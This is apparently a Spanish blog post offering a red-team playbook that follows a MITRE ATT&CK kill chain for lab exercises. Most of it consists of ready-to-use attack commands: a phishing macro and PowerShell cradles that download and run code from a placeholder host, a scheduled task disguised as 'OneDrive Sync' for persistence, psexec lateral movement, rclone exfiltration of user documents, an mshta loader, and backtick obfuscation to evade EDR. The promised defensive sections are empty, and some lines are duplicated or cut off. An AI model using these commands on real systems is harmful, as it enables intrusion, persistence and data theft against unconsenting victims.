Buscar

30 junio 2025

Playbook técnico: Simulación Red Team con MITRE ATT&CK

  junio 30, 2025 akil3s   No comments   Edit

 

1️⃣ Introducción

Este playbook proporciona una guía detallada para simular una intrusión de un atacante real siguiendo la lógica de la matriz MITRE ATT&CK. La finalidad es reproducir, de manera controlada, técnicas y tácticas ofensivas de adversarios avanzados (APT), evaluando simultáneamente la eficacia de las defensas actuales.

Pensado para Red Teamers, pentesters internos o ejercicios de Purple Teaming, incluye herramientas gratuitas, comandos específicos, artefactos recomendados y sugerencias defensivas por cada etapa.

2️⃣ Preparación del entorno

💻 Infraestructura mínima

  • Máquina atacante: Kali Linux / Parrot OS
  • Víctimas Windows: una estación de trabajo y, opcional, un DC
  • Red: segmentada, sin salida a internet real (Host-Only o Interna)

🧰 Herramientas sugeridas


Contenido del artículo

3️⃣ Cadena de ataque (ejercicio base)

🔹 Táctica: Acceso Inicial → [T1566.001 - Phishing con adjunto malicioso]

  • Genera un .docm con macro que ejecute un dropper de Sliver:

Sub AutoOpen()
  Shell "powershell -w hidden -nop -c IEX(New-Object Net.WebClient).DownloadString('http://IP/sliver.ps1')"
End Sub

  • Envíalo con GoPhish simulando un correo interno IT.

🔹 Táctica: Ejecución → [T1059.001 - PowerShell Execution]

  • El script conecta con Sliver o Empire en modo callback:

IEX (New-Object Net.WebClient).DownloadString("http://C2/callback.ps1")

🔹 Táctica: Persistencia → [T1053.005 - Scheduled Task]

  • Una vez dentro, crea tarea persistente:

schtasks /create /sc onlogon /tn "OneDrive Sync" /tr "powershell.exe -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://IP/persist.ps1')"

🔹 Táctica: Privilege Escalation → [T1548.002 - Bypass UAC]

  • Ejecuta WinPEAS o SharpUp para identificar bypasses de UAC.
  • Usa fodhelper.exe para ejecutar sin prompt:

Start-Process "cmd.exe" -Verb runAs

🔹 Táctica: Discovery → [T1087, T1018, T1082]

  • Usa PowerView o SharpHound para mapear dominio:

Invoke-UserHunter
Invoke-ACLScanner

🔹 Táctica: Movimiento Lateral → [T1021.002 - SMB/Windows Admin Shares]

  • Usa smbexec.py, psexec.py (Impacket) o Invoke-PsExec.
  • También puedes abusar de winrm o RDP si encuentras credenciales.

🔹 Táctica: Exfiltración → [T1048.002 - Envío por Web Service]

  • Usa rclone para enviar archivos a Google Drive (laboratorio):

rclone copy C:\Users\user\Documents gdrive:/exfil --drive-chunk-size=64M

4️⃣ Recomendaciones defensivas (por táctica)

Contenido del artículo

5️⃣ Registro y reporte (ampliado)

Una simulación Red Team sin documentación pierde todo su valor operativo. El registro no es solo para justificar acciones, sino para mejorar detección y defensa en iteraciones futuras.

✅ ¿Qué registrar?

  • Técnica ATT&CK aplicada (ej. T1566.001 - Phishing con documento malicioso)
  • Comando ejecutado / herramienta usada
  • IP origen / IP destino
  • Credenciales utilizadas (si se escalan)
  • Alertas defensivas generadas
  • Artefactos encontrados por el Blue Team
  • Tiempo de detección y contención (si aplica)

📝 Ejemplo de entrada de registro:

Táctica: Movimiento lateral (T1021.002 - SMB Admin Shares)
Herramienta: psexec.py (Impacket)
Comando: psexec.py dominio.local/admin:pass@192.168.56.22
Resultado: acceso remoto como SYSTEM
EDR: no generó alerta
SIEM: alertó ejecución de cmd.exe desde sistema remoto
Tiempo desde acción hasta alerta: 2 minutos

🔧 Herramientas para documentar:

  • MITRE ATT&CK Navigator (con anotaciones)
  • Plantilla en Excel/Obsidian/Markdown
  • Generadores automáticos como RedELK o DetectionLab para mapear defensa vs ataque

6️⃣ Variaciones posibles (ampliado con ejemplos)

Estas variaciones permiten fortalecer ejercicios y simular TTPs más avanzadas o adaptadas a distintos niveles de madurez defensiva.

🔹 Ejemplo 1: Intrusión sin PowerShell

Simular una ejecución en entorno con PowerShell bloqueado:

Set objShell = CreateObject("WScript.Shell")
objShell.Run "mshta http://IP/loader.hta", 0

  • El .hta ejecuta código VBScript que droppea un stager.
  • Ideal para simular entornos con AMSI reforzado o con PowerShell desactivado por GPO.

🔹 Ejemplo 2: Simulación por .iso o .lnk

  • Crear .iso que contiene:
  • Esto simula campañas como BazarLoader o FIN7 que usan .iso firmados como vector inicial.
  • Al hacer doble clic, ejecuta:

powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://IP/stage.ps1')

  • Esto simula campañas como BazarLoader o FIN7 que usan .iso firmados como vector inicial.

🔹 Ejemplo 3: Ofuscación avanzada y bypass de EDR

  • Uso de Invoke-Obfuscation para evitar firmas del EDR:

I`E`X ((N`ew-Obj`ect Ne`T.WebCl`ient).DownLoa`dString('http://IP/payload'))

  • Combina con ejecución en memoria (Invoke-ReflectivePEInjection) para evitar drop en disco.

🔹 Ejemplo 4: Exfiltración silenciosa

  • Enviar datos vía DNS tunneling (simulado):
  • Herramientas: dnscat2, iodine
  • Comportamiento muy evasivo, difícil de detectar sin inspección profunda de DNS

7️⃣ Conclusión / Tip final

Una simulación Red Team bien planteada no busca solo "entrar", sino demostrar cómo se entra, cómo se mantiene el atacante y qué visibilidad tuvo la defensa en cada fase.
Suscribirse a: Comentarios (Atom)